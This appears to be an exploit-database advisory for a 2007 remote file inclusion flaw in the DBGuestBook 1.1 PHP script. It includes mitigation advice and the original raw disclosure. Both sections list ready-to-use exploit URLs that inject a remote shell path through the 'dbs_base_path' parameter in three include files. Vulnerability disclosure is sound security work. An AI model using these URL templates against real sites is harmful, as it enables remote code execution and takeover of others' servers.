DBGuestBook 1.1 RFI Vulnerability

vendor:

DBGuestBook

by:

Denven

7.5

CVSS

HIGH

RFI

CWE

Product Name: DBGuestBook

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

DBGuestBook 1.1 RFI Vulnerability

The DBGuestBook 1.1 script is vulnerable to Remote File Inclusion (RFI) attacks. An attacker can exploit this vulnerability by injecting a malicious file path in the 'dbs_base_path' parameter in the following URLs:- http://SITE.com/path/includes/utils.php?dbs_base_path=[SHELL]- http://SITE.com/path/includes/guestbook.php?dbs_base_path=[SHELL]- http://SITE.com/path/includes/views.php?dbs_base_path=[SHELL]By exploiting this vulnerability, the attacker can execute arbitrary code on the server.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of the DBGuestBook script or apply a security patch provided by the vendor. Additionally, proper input validation and sanitization should be implemented to prevent malicious file inclusion.

Source

Exploit-DB raw data:

DBGuestBook 1.1
 
*****************
Found by Denven *
*****************
Script: http://www.dbscripts.net/download/?file=2
*****************
ERROR:
 
includes/utils.php                               require_once $dbs_base_path
includes/guestbook.php                           require_once $dbs_base_path
includes/views.php                               require_once $dbs_base_path
 
 
 
**************************************************************************************
RFI:
 
http://SITE.com/path/includes/utils.php?dbs_base_path=[SHELL]
http://SITE.com/path/includes/guestbook.php?dbs_base_path=[SHELL]
http://SITE.com/path/includes/views.php?dbs_base_path=[SHELL]
 

**************************************************************************************
denven[at]gmail[dot]com

# milw0rm.com [2007-02-21]